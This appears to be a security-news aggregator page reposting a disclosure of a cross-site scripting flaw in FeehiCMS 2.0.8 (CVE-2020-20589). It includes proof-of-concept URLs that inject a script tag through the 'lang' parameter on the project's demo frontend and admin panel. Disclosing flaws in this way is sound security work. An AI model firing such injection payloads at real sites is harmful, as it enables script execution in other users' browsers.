Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-20589: XSS vulnerability in feehicms v2.0.8 · Issue #45 · liufee/cms

Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.0.8 allows remote attackers to run arbitrary code via tha lang attribute of an html tag.

CVE
Open in Source
#xss#vulnerability#js#php

This is a Cross Site Scripting vulnerability appear two place(frontend and backend). When the lang is english"><script>alert(/xss/)</script>< or other js code, the pop-up alert will be triggered when browsing the feehi post. Details are as follows:

POC example:
http://demo.cms.feehi.com/index.php?r=site/language&lang=english"><script>alert(/xss/)</script><
or

http://demo.cms.feehi.com/admin/index.php?r=site/language&lang=english"><script>alert(/xss/)</script>

View any post and xss pop-up:

jscode:

Related news

GHSA-pwh3-3pcm-6vjh: FeehiCMS vulnerable to Cross Site Scripting

Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.0.8 allows remote attackers to run arbitrary code via tha lang attribute of an html tag.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE